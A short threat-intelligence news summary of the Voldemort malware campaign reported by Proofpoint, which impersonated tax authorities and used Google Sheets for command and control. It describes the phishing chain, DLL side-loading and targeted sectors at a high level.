Cybersecurity researchers discovered a novel malware campaign using Google Sheets as a command-and-control (C2) mechanism. Detected by Proofpoint starting August 5, 2024, the campaign impersonates tax authorities from various countries to target over 70 organizations globally using a custom tool called Voldemort. The campaign has not been attributed to a specific threat actor, but it resembles both cyber espionage and cybercrime activities.
Targeted Sectors:
- A wide range of sectors including insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations.
Attack Methodology:
- The campaign sends phishing emails claiming to be from tax authorities in several countries (U.S., U.K., France, Germany, Italy, India, Japan).
- Emails direct recipients to Google AMP Cache URLs, which lead to an intermediate page that checks if the operating system is Windows.
- If Windows is detected, it uses the search-ms: URI protocol to display a malicious Windows shortcut (LNK) file disguised as a PDF.
- Executing the LNK file triggers PowerShell to run a Python script from a WebDAV share without downloading any files locally, with dependencies loaded directly from the WebDAV share.
Malware Capabilities:
- The Python script collects system information and sends it as a Base64-encoded string to an actor-controlled domain.
- It also shows a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive containing:
- A legitimate executable (“CiscoCollabHost.exe”) vulnerable to DLL side-loading.
- A malicious DLL (“CiscoSparkLauncher.dll”), named Voldemort, which is a custom backdoor written in C.
- Voldemort uses Google Sheets for C2 communication, data exfiltration, and executing commands.
Techniques and Tools:
- The campaign abuses file schema URIs (“file://”) to access external resources for malware staging via WebDAV and SMB.
- These tactics are common among initial access brokers (IABs) like Latrodectus, DarkGate, and XWorm.
Findings and Observations:
- Proofpoint identified six victims using Google Sheets, one of which may be a sandbox or a researcher.
- The campaign appears to have cast a wide net before focusing on a smaller set of targets.
- The campaign combines sophisticated techniques with basic methods, making it difficult to assess the threat actor’s technical capabilities and final objectives.
Context and Implications:
- The campaign reflects a “Frankensteinian” mix of advanced and rudimentary tactics, complicating attribution and threat assessment.
- It suggests potential espionage motives behind the campaign, although the final objectives remain unknown.
- Netskope Threat Labs recently reported an updated version of the Latrodectus malware, highlighting ongoing evolution and feature enhancements, which include new backdoor commands for downloading shellcode and retrieving files.